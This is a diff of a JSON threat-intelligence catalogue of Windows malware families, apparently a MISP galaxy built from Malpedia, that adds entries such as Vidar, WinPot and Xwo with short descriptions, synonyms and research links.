"https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html" ], "synonyms": [], "type": [] @@ -15547,6 +17706,21 @@ "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, + { + "description": "Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", + "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1f44c08a-b427-4496-9d6d-909b6bf34b9b", + "value": "vidar" + }, { "description": "", "meta": { @@ -15565,8 +17739,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", + "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/", + "https://chrisdietri.ch/post/virut-resurrects/", + "https://www.secureworks.com/research/virut-encryption-analysis", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/" + "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", + "https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet", + "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/" ], "synonyms": [], "type": [] @@ -15665,6 +17844,19 @@ "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wallyshack", + "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bd92907-c858-4164-87d6-fec0f3595e69", + "value": "WallyShack" + }, { "description": "", "meta": { @@ -15893,11 +18085,12 @@ "value": "WebC2-Yahoo" }, { - "description": "", + "description": "On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.'\r\nUnit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", + "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/" ], "synonyms": [], "type": [] @@ -15936,7 +18129,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -15952,11 +18145,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://github.com/TKCERT/winnti-suricata-lua", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "https://github.com/TKCERT/winnti-nmap-script", "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", + "https://github.com/TKCERT/winnti-nmap-script", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-detector", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://securelist.com/games-are-over/70991/", + "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" ], "synonyms": [], "type": [] @@ -15964,6 +18159,22 @@ "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (Windows)" }, + { + "description": "WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", + "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", + "https://securelist.com/atm-robber-winpot/89611/" + ], + "synonyms": [ + "ATMPot" + ], + "type": [] + }, + "uuid": "893a1da2-ae35-4877-8cde-3f532543af36", + "value": "WinPot" + }, { "description": "", "meta": { @@ -16062,16 +18273,30 @@ "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "62fd2b30-55b6-474a-8d72-31e492357d11", + "value": "WSCSPL" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" ], "synonyms": [ @@ -16156,7 +18381,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], @@ -16203,12 +18428,26 @@ "uuid": "000e25a4-4623-4afc-883d-ecc15be8f9d0", "value": "X-Tunnel (.NET)" }, + { + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", + "https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a57cd75-4572-47c2-b5ef-55df978258de", + "value": "Xwo" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ @@ -16284,8 +18523,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", + "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", + "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", + "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", + "https://securelist.com/a-zebrocy-go-downloader/89419/" ], "synonyms": [ "Zekapab" @@ -16336,6 +18582,7 @@ ], "synonyms": [ "Max++", + "Sirefef", "Smiscer" ], "type": [] @@ -16553,5 +18800,5 @@ "value": "Zyklon" } ], - "version": 1838 + "version": 2559 }